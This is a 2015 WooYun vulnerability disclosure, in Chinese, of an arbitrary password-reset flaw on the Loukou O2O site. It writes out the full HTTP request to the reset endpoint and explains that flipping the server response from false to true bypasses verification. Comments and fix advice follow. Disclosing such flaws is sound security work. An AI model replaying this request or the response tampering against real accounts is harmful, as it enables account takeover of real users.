当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136440

漏洞标题:O2O之楼口网任意用户密码修改漏洞

相关厂商:楼口网

漏洞作者: 疯子

提交时间:2015-08-24 16:47

修复时间:2015-10-08 16:48

公开时间:2015-10-08 16:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

百万级别的用户量

详细说明:

GET /index.php?app=member.member_loukou&act=send_find_pwd_phone&uid=9971tlfDZwoK09KCrd6GlI%2B%2B34%2BLQtfI3ooFVIffAjYodbC08VR0lw&phonecheckcode=123456&phone_mob=13800138000HTTP/1.1
Host: wap.loukou.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; vivo Y27 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Referer: http://wap.loukou.com/index.php?app=member.member_loukou&act=app_send_phone_email&um=13800138000&openId=a_866950020892013_7af4b5cb87088622_4.4.4%3Bvivo%20Y27%3Bvivo&apiVersion=1.0.0&width=720&height=1280&appName=a_com.wjwl.mobile.taocz&app_version=6.3.2&app_channel=d07&os=android&channel=d07&cityId=1
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: TCZ_ID=h5k0eq7m2fkev0umihcvqebap4

漏洞证明:

Response 返回flase改为ture

126247657822449418.jpg


350796667175054100.jpg

修复方案:

不要相信用户的验证

版权声明:转载请注明来源 疯子@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2015-08-24 16:55 | qhwlpg ( 普通白帽子 | Rank:241 漏洞数:63 | 潜心代码审计。)

    终于发洞了啊,看你好久没刷了

  2. 2015-08-24 17:09 | 进击的zjx ( 普通白帽子 | Rank:321 漏洞数:66 | 工作需要,暂别一段时间)

    沉寂了一年啊!

  3. 2015-09-04 09:57 | 大饭刚 ( 实习白帽子 | Rank:53 漏洞数:11 | 吃饭,喝酒,挖洞洞)

    恩,洞主1年没发洞了。